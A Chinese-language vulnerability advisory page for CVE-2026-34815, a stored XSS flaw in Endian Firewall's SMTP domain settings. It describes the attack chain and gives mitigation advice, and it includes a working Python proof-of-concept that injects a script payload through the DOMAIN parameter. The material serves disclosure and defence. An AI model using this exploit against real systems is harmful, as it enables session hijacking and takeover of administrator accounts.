IPBUF安全漏洞报告
English
CVE-2026-34815 CVSS 6.4 中危

CVE-2026-34815 Endian Firewall存储型XSS漏洞

披露日期: 2026-04-02

漏洞信息

漏洞编号
CVE-2026-34815
漏洞类型
存储型跨站脚本
CVSS评分
6.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Endian Firewall

相关标签

XSS存储型XSSEndian FirewallWeb安全CVE-2026-34815

漏洞概述

Endian Firewall 3.3.25及之前版本中的/cgi-bin/smtpdomains.cgi接口存在存储型跨站脚本(XSS)漏洞。由于未对DOMAIN参数进行充分过滤,经过身份认证的攻击者可注入恶意JavaScript代码。该代码被存储并在其他用户查看页面时执行,可能导致会话劫持或敏感信息泄露。

技术细节

该漏洞的根本原因是Endian Firewall在处理SMTP域名配置时,缺乏对用户输入的严格验证和输出编码。攻击者需具备低权限账户,通过向`/cgi-bin/smtpdomains.cgi`发送特制的POST请求,将恶意脚本注入到`DOMAIN`参数中。服务器接收数据后直接存储,未进行无害化处理。当管理员或其他用户访问受影响的域名管理页面时,服务器响应中包含未转义的恶意脚本,浏览器将其解析并执行。由于CVSS向量包含S:C(Scope Changed),攻击者可利用此漏洞影响与脆弱组件不同的安全上下文,窃取Cookie或Session ID,进而提升权限或执行管理操作。

攻击链分析

STEP 1
步骤1:身份认证
攻击者利用获取的低权限账户登录Endian Firewall管理界面。
STEP 2
步骤2:漏洞利用
攻击者构造包含恶意JavaScript代码的HTTP POST请求,发送至/cgi-bin/smtpdomains.cgi,并将恶意代码赋值给DOMAIN参数。
STEP 3
步骤3:数据持久化
服务器接收并存储攻击者提交的恶意数据,未进行过滤或转义。
STEP 4
步骤4:触发执行
当管理员或其他用户访问包含被污染数据的SMTP域名管理页面时,恶意脚本在受害者浏览器中自动执行。
STEP 5
步骤5:窃取会话
脚本执行后,攻击者窃取受害者的Session ID或执行其他恶意操作,从而接管管理员权限。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL url = "https://<target_ip>/cgi-bin/smtpdomains.cgi" # Attacker's authenticated session cookie cookies = { "sid": "valid_session_cookie_here" } # Malicious payload to demonstrate the XSS payload = '"><script>alert(document.cookie)</script>' # Data payload for the request # 'DOMAIN' is the vulnerable parameter identified in the CVE data = { "DOMAIN": payload, "ACTION": "Add" } try: # Sending the POST request to inject the payload response = requests.post(url, data=data, cookies=cookies, verify=False) if response.status_code == 200: print("[+] Payload injected successfully.") print("[+] Check the page to verify script execution.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

Endian Firewall <= 3.3.25

防御指南

临时缓解措施
在未升级修复之前,建议限制对/cgi-bin/smtpdomains.cgi接口的访问,仅允许受信任的IP地址访问。同时,部署Web应用防火墙(WAF)以检测和拦截包含常见XSS攻击特征(如<script>标签、javascript:协议等)的请求流量。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表